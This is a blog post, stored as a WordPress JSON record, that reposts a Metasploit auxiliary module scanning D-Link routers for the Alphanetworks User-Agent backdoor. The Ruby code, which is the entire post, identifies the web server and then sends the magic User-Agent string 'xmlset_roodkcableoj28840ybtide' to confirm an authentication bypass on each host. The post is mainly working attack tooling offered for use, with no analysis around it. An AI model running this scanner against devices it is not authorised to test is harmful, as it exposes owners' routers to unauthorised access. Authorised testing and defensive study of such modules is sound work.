{"id":59359,"date":"2024-09-01T20:29:48","date_gmt":"2024-09-01T17:29:48","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181170\/dlink_user_agent_backdoor.rb.txt"},"modified":"2024-09-01T20:29:48","modified_gmt":"2024-09-01T17:29:48","slug":"d-link-user-agent-backdoor-scanner","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/d-link-user-agent-backdoor-scanner\/","title":{"rendered":"D-Link User-Agent Backdoor Scanner"},"content":{"rendered":"<p>##<br \/># This module requires Metasploit: https:\/\/metasploit.com\/download<br \/># Current source: https:\/\/github.com\/rapid7\/metasploit-framework<br \/>##<\/p>\n<p>class MetasploitModule &lt; Msf::Auxiliary<br \/>include Msf::Exploit::Remote::HttpClient<br \/>include Msf::Auxiliary::Scanner<br \/>include Msf::Auxiliary::Report<\/p>\n<p>def initialize<br \/>super(<br \/>&#8216;Name&#8217; =&gt; &#8216;D-Link User-Agent Backdoor Scanner&#8217;,<br \/>&#8216;Description&#8217; =&gt; %q{<br \/>This module attempts to find D-Link devices running Alphanetworks web interfaces affected<br \/>by the backdoor found on the User-Agent header. This module has been tested successfully<br \/>on a DIR-100 device with firmware version v1.13.<br \/>},<br \/>&#8216;Author&#8217; =&gt;<br \/>[<br \/>&#8216;Craig Heffner&#8217;, # vulnerability discovery<br \/>&#8216;Michael Messner &lt;devnull[at]s3cur1ty.de&gt;&#8217;, # Metasploit module<br \/>&#8216;juan vazquez&#8217; # minor help with msf module<br \/>],<br \/>&#8216;License&#8217; =&gt; MSF_LICENSE,<br \/>&#8216;References&#8217; =&gt;<br \/>[<br \/>[ &#8216;URL&#8217;, &#8216;http:\/\/www.devttys0.com\/2013\/10\/reverse-engineering-a-d-link-backdoor\/&#8217; ]],<br \/># First documented in detail by Craig, but looks like it&#8217;s been known<br \/># (at least to the Russians :-) ) since 2010 &#8211; see post at forum.codenet.ru<br \/>&#8216;DisclosureDate&#8217; =&gt; &#8220;Oct 12 2013&#8221;<br \/>)<\/p>\n<p>end<\/p>\n<p>def is_alpha_web_server?<br \/>begin<br \/>res = send_request_cgi({&#8216;uri&#8217; =&gt; &#8216;\/&#8217;})<br \/>rescue ::Rex::ConnectionError<br \/>vprint_error(&#8220;#{rhost}:#{rport} &#8211; Failed to connect to the web server&#8221;)<br \/>return false<br \/>end<\/p>\n<p># Signatures:<br \/># * httpd-alphanetworks\/2.23<br \/># * Alpha_webserv<br \/>if res and res.headers[&#8220;Server&#8221;] and res.headers[&#8220;Server&#8221;] =~ \/alpha\/i<br \/>return true<br \/>end<\/p>\n<p>return false<br \/>end<\/p>\n<p>def run_host(ip)<\/p>\n<p>if is_alpha_web_server?<br \/>vprint_good(&#8220;#{ip} &#8211; Alphanetworks web server detected&#8221;)<br \/>else<br \/>vprint_error(&#8220;#{ip} &#8211; Alphanetworks web server doesn&#8217;t detected&#8221;)<br \/>return<br \/>end<\/p>\n<p>begin<br \/>res = send_request_cgi({<br \/>&#8216;uri&#8217; =&gt; &#8216;\/&#8217;,<br \/>&#8216;method&#8217; =&gt; &#8216;GET&#8217;,<br \/>&#8216;agent&#8217; =&gt; &#8216;xmlset_roodkcableoj28840ybtide&#8217;<br \/>})<br \/>rescue ::Rex::ConnectionError<br \/>vprint_error(&#8220;#{ip}:#{rport} &#8211; Failed to connect to the web server&#8221;)<br \/>return<br \/>end<\/p>\n<p># DIR-100 device with firmware version v1.13<br \/># not sure if this matches on other devices<br \/># TODO: Testing on other devices<br \/>if res and res.code == 200 and res.headers[&#8220;Content-length&#8221;] != 0 and res.body =~ \/Home\\\/bsc_internet\\.htm\/<br \/>print_good(&#8220;#{ip}:#{rport} &#8211; Vulnerable for authentication bypass via User-Agent Header \\&#8221;xmlset_roodkcableoj28840ybtide\\&#8221;&#8221;)<br \/>end<\/p>\n<p>end<br \/>end<\/p>\n","protected":false},"excerpt":{"rendered":"<p>### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule &lt; Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::Report def initializesuper(&#8216;Name&#8217; =&gt; &#8216;D-Link User-Agent Backdoor Scanner&#8217;,&#8216;Description&#8217; =&gt; %q{This module attempts to find D-Link devices running Alphanetworks web interfaces affectedby the backdoor found on the User-Agent header. This module has been tested successfullyon a DIR-100 device with firmware version &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59359","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59359","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59359"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59359\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}